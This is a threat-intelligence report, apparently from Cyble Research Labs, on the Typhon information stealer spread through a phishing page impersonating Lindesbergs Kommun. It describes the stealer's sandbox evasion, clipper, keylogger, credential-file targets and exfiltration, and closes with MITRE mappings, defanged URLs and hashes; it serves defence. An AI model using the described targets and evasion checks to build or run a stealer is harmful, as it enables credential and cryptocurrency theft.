Cyble-Typhon-Malware

Phishing Site used to Spread Typhon Stealer

New stealer developing Crypto Miner capabilities

During a routine threat hunting exercise, Cyble Research Labs (CRL) came across a Twitter post wherein researchers mentioned a URL that hosts a Windows executable payload with the name systemupdate.exe. The researcher in the Twitter post claims this Windows executable is a variant of Typhon stealer malware delivered via a crafted .lnk file.

Upon analyzing the mentioned URL, we identified that it also hosts a phishing page that impersonates Lindesbergs Kommun (a municipality in Örebro County in central Sweden) to steal users’ sensitive information such as name, Social Security Number (SSN), ORT, and Credit/Debit card details and sends it to the Threat Actor’s (TAs) server.

When a user opens a .lnk file, it further executes a PowerShell command, downloads Typhon stealer from the remote server, and executes it. The below image shows the content of the .lnk file.

Figure 1 – Content of LNK File

Cyble Research Labs also downloaded the Windows executable and performed a deep dive analysis on it. We observed that this malicious program is based on Prynt Stealer and can steal data from multiple applications. The developer of the stealer has also added a module for delivering XMRig CryptoMiner, which appears to be either in a development stage or the TA who generated this stealer using a builder did not add this functionality.

The TAs has also created a Telegram channel to communicate with the people who want to purchase Typhon stealer services. The below images show the Typhon stealer is updated through a Telegram channel, where the TA is actively working on releasing updates for the stealer. The TA sells this stealer via a lifetime subscription model for $50.

Figure 2 – Typhon Stealer Telegram Channel

Interestingly, the TA also provides spreading and crypting services for the ones who purchase this stealer, as shown below.

Figure 3 – Spreading and Crypting Services Telegram Post

Technical Analysis

Phishing Page Analysis

When the user visits the URL: hxxp://lindesbergparkeringsanmarkning[.]netlify[.], it opens a fake payment form with a name and logo related to Lindesbergs kommun which asks the users to pay 300 SEK(Swedish krona, the national currency of Sweden).

The payment form also asks for users’ sensitive information such as name, Social Security Number (SSN), ORT, and Credit/Debit card details.

Figure 4 – Hosted Phishing Page

When users enter their details in the above form page, it sends all the provided details to the server using Formspree through the URL: hxxps://formspree[.]io/f/xknylake.

Formspree is a form backend, API, and email service for HTML forms that sends form submissions via email without needing any coding or a backbend. It provides its services for free or at a very low cost.

Figure 5 – User Info being sent to the Server

After sending the users’ information to the server, the website redirects users to the Formspree acknowledgment page, which acknowledges the submission.

Figure 6 – Formspree Acknowledgement Page

Payload Analysis

Anti-Analysis:

(Sample SHA256: 67afd1f116ffcf84c59bef3d3b925dc82dadebc21f2e8cc39b77892104b9e9ec)

The malware initially performs various Anti-Analysis checks if the TA enabled the Anit-Analysis functionality while building the malware. This stealer will return a binary flag with the value “True” if it detects antivirus applications or a sandbox environment and will terminate itself with a fake error message.

The malware identifies the following DLL files related to sandbox and antivirus programs in the victims’ machine using the GetModuleHandle() function.

SbieDll.dllSandboxie
SxIn.dll360 Total Security
Sf2.dllAvast Antivirus
snxhk.dllAvast Antivirus
cmdvrt32.dllCOMODO

This stealer also checks if the following applications are running to prevent analysis of malware:

  • processhacker
  • netstat
  • netmon
  • tcpview
  • Wireshark
  • filemon
  • regmon
  • cain

The stealer calls the CheckRemoteDebuggerPresent() function to identify the process being debugged. It also uses Windows Management Instrumentation (WMI) queries to detect the Virtual Environment, as shown below.

Figure 7 – Using WMI queries

The stealer also checks for a mutex named “GOJJL2LPIZM04XC0NQ4I” to ensure that only one instance of malware is running in the victims’ machine. The malware terminates its execution if the mutex is already present.

The stealer also has the capability of spreading through mounted drives. It copies itself as a “USB-Service” to the mounted drives.

The stealer can also copy itself into the startup folder to establish persistence. Copying files to the startup folder enables the TA to execute the stealer upon user login automatically. 

The stealer creates a hidden folder in the Local/AppData directory to store the stolen data. For naming this folder, it creates an MD5 hash using a concatenated string which consists of “Username, Computer Name, Culture, Processor Name, Video Controller Name.”

Under this, it creates another folder that will be named using the “Username + @ + Computer Name+ _ +Culture” string.

Clipper

Clipper enables TAs to steal cryptocurrency by replacing the wallet address in the victim’s clipboard with their own wallet address. Typhon Stealer can perform clipping activities on the following Cryptocurrencies:

  • Ethereum (ETH)
  • Bitcoin (BTC)
  • XRP (XRP)
  • Stellar (XLM)
  • Monero (XMR)
  • Bitcoin Cash (BCH)
  • Litecoin (LTC)

The figure below shows the Base64 encoded RegEx values to identify respective crypto addresses from the clipboard.

Figure 8 – Encoded RegEx

Keylogger

The stealer can also perform keylogging activities. It creates a separate thread for this functionality and saves the victim’s data under the “logs\\keylogger\\” folder. The figure below shows the Keylogger functionality in the stealer.

Figure 9 – Keylogger Functionality

Browsers

This Typhon sample targets three browsers:

  • Chromium-based browsers
  • Microsoft Edge
  • Firefox-based browsers

Typhon stealer targets over 30 Chromium-based browsers, 5+ Mozilla-based browsers, and MS Edge. Every browser stores a file in the Local\AppData\Browser folder with sensitive information such as login credentials, cookies, autofill data, etc. The Typhon stealer target these files for stealing data. The figure below shows the browser directories targeted by the stealer.

Figure 10 – Targeted Browsers

FTP Applications

Typhon stealer targets two FTP applications:

  • FileZilla
  • WinSCP

FileZilla is a free and open-source, cross-platform FTP application. It steals the data from “sitemanager.xml” and “recentservers.xml” and stores the data in the “Hosts.txt” file under the “FileZilla” folder for exfiltration.

Figure 11 – Stealing User Data from FileZilla

WinSCP is a popular SFTP client and FTP client for Windows. WinSCP saves the user session-related data in the registry. Typhon stealer grabs the WinSCP data from “Software\\Martin Prikryl\\WinSCP 2\\Sessions” registry key.

Figure 12 – Stealing WinSCP data from Registry

Gaming

Typhon Stealer targets the following gaming applications and steals sensitive data from the victim’s machine.

  • Steam
  • Minecraft
  • Uplay

Steam:

The malware identifies the Steam installation path by checking the registry key value at HKEY_LOCAL_MACHINE\Software\Valve\Steam. After this action, it enumerates the subkey present under HKEY_LOCAL_MACHINE\Software\Valve\Steam\Apps to get details of the application, as can be seen in the figure below. The malware also targets the steam’s SSFN file, known as the authorization file, and copies it for exfiltration.

Figure 13 – Targeting Steam

Uplay:

The malware looks for “Ubisoft Game Launcher” in the AppData folder; if this folder is present, it copies all the files for exfiltration.

Figure 14 – Copying Uplay Files

Minecraft:

For Minecraft, the stealer checks if the “.minecraft” folder is present under the AppData directory. If it is present, it creates a folder named “Minecraft” under the “Gaming” folder to save the stolen data.

This stealer copies “launcher_profiles.json,” “servers.dat,” and screenshots to the “Minecraft” folder for exfiltration. It also extracts mods and version details and saves them in the respective text files created in the “Minecraft” folder.

Figure 15  – Stealing Data from Minecraft

Messaging Applications

The Typhon stealer targets the following messaging applications:

  • Discord
  • Telegram
  • Pidgin

The malware first creates a folder named “Messenger,” which will be used for saving data from these applications. For stealing  Discord tokens, it first searches for the following directories:

  • Discord\\Local Storage\\leveldb
  • discordptb\\Local Storage\\leveldb
  • Discord Canary\\leveldb

The malware steals Telegram sessions by copying files from the “Telegram Desktop\tdata” folder. For Pidgin, the malware first identifies if “.purple\\accounts.xml” is present in the AppData folder. It steals the login credentials and protocol details and saves them into the “Pidgin Accounts.txt” file, as shown below.

Figure 16 – Stealing Pidgin Login Credentials

VPN

This stealer steals credentials from three VPNs: ProtonVPN, OpenVPN, and NordVPN.

The malware first checks whether a VPN is installed or not by checking the directory C:\Users\[username]\AppData\Local\[VPN name], as shown in the figure below.

Figure 17 – Checking Installed VPNs

If a targeted VPN service is installed on the victim’s system, the stealer steals the credentials from the configuration files, such as user.config, etc., and copies the configuration file to the folder used for saving stolen data.

Wallets

Typhon Stealer targets crypto wallets, as shown in the figure below. The stealer createsa folder named “Wallets” and then enumerates a list of BASE64 encoded wallets path to identify if a wallet is present on the victim’s system.

It also targets Blockchains such as Bitcoin, Dash, and Litecoin by fetching the path from registry key  HKEY_CURRENT_USER\Software\Blockchain_name\ Blockchain_name-Qt

Figure 18 – Targeting Cold Crypto Wallets

Grabber

This stealer grabs files from directories such as Desktop, My Pictures, Personal, Downloads, OneDrive, and Dropbox. It only grabs files that are smaller than 5MB and have the extensions mentioned below.

TypeExtension
Documentpdf, RTF, doc, Docx, Xls, xlsx, ppt, pptx, indd, txt, JSON
Databasedb, db3, db4, kdb, kdbx, SQL, SQLite, MDF, MDB, dsk, dbf, wallet, ini
SourceCodec, cs, CPP, asm, sh, py, pyw, HTML, CSS, php, go, js, rb, pl, swift, java, kt, kts, ino
Imagejpg, jpeg, png, BMP, PSD, SVG, ai

It also steals the system information such as Hardware Details, OS details, Windows product keys, etc. The figure below shows sample system information data stolen by the stealer. The stealer also has the functionality of taking pictures from the victim’s webcam.

Figure 19 – Stealing System Info

Exfiltration

Along with exfiltrating data to the Telegram channel, the stealer can also upload the stolen data to Anon Files. AnonFiles is a file upload and download service that allows users to host a file anonymously. The figure below shows the AnonFiles upload functionality.

Figure 20 – Exfiltrating Data to AnonFiles

Other Functionalities

It appears that this stealer can also be used for delivering XMRig, which is a Cryptominer. Currently, this feature is not in a functional state for this sample, but we suspect that in the future, TAs might use Typhon Stealer to deliver cryptominers.

Figure 21 – XMRig Downloader

Conclusion

Threat Actors continuously enhance their techniques to target users from various sectors, such as Govt. organizations and industries from various domains. In this case, they are using the Lindesbergs Kommun organization’s theme to lure the users and deploy the Typhon stealer payload.

In the past, Cyble has observed numerous data breaches in prominent organizations through such malicious programs. Organizations or individuals are advised to follow industry-standard cybersecurity practices to secure themselves and their firms.

Our Recommendations

We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices given below:  

How to prevent malware infection?

  • Avoid downloading pirated software from warez/torrent websites. The “Hack Tool” present on sites such as YouTube, torrent sites, etc., mainly contains such malware.
  • Use strong passwords and enforce multi-factor authentication wherever possible. 
  • Turn on the automatic software update feature on your computer, mobile, and other connected devices.
  • Use a reputed antivirus and internet security software package on your connected devices, including PC, laptop, and mobile.
  • Refrain from opening untrusted links and email attachments without first verifying their authenticity. 
  • Educate employees in terms of protecting themselves from threats like phishing’s/untrusted URLs.
  • Block URLs that could be used to spread the malware, e.g., Torrent/Warez.
  • Monitor the beacon on the network level to block data exfiltration by malware or TAs.
  • Enable Data Loss Prevention (DLP) Solution on the employees’ systems.

MITRE ATT&CK® Techniques

Tactic Technique ID Technique Name 
Initial Access T1566 Phishing 
Execution T1204 User Execution 
Defense Evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 
Credential Access T1555 
T1539 
T1552 
T1528 
Credentials from Password Stores 
Steal Web Session Cookie
Unsecured Credentials 
Steal Application Access Token 
Collection T1113 Screen Capture 
Discovery T1087 
T1518 
T1057 
T1124 
T1007 
T1614 
Account Discovery 
Software Discovery 
Process Discovery 
System Time Discovery 
System Service Discovery 
System Location Discovery   
Command and Control T1095 Non-Application Layer Protocol 
Exfiltration T1041 
T1567 
Exfiltration Over C&C Channel 
Exfiltration Over Web Service     

Indicators of Compromise (IOCs)

IndicatorsIndicator TypeDescription
a1f146eb008f077be809ab4e61f46f4eMD5TyphonStealer Payload
8af9fc9aa7517ac327cc8692c2adf54537f39fe5SHA-1TyphonStealer Payload
e04e65ddad749789f4f05bb88e2c8bde8df9263950eb120ad1191f217ca0c742SHA-256TyphonStealer Payload
79dc4a4192469c3e697afd81409a52daMD5TyphonStealer Payload
51aa7b94b3f3921d21e730b113faa20e0f6b6902SHA-1TyphonStealer Payload
48133d1aaf1a47f63ec73781f6a2b085b28174895b5865b8993487daec373e0aSHA-256TyphonStealer Payload
77f7d71475362232d13adbdb19e876ffMD5TyphonStealer Payload
7c4ff5acfc57573279c9abc6779a8bc547b23d12SHA-1TyphonStealer Payload
d68f00429a5f39c718cc704ee11e8e10d37c8ffc831630d753c922269bc01b86SHA-256TyphonStealer Payload
ce4675c0ab630d8e1e89eb7c9d23188dMD5TyphonStealer Payload
b4d71ad21f6f6cff7d297bbe1431a007b0d3e792SHA-1TyphonStealer Payload
524180810d0b9764e5ef3923a8eb34b2ed8ca1923244be37e94ca57d889ede9bSHA-256TyphonStealer Payload
hxxp://lindesbergparkeringsanmarkning[.]netlify[.]appURLURL Hosting Phishing Page and TyphonStealer Payload
hxxps://formspree[.]io/f/xknylake  
Scroll to Top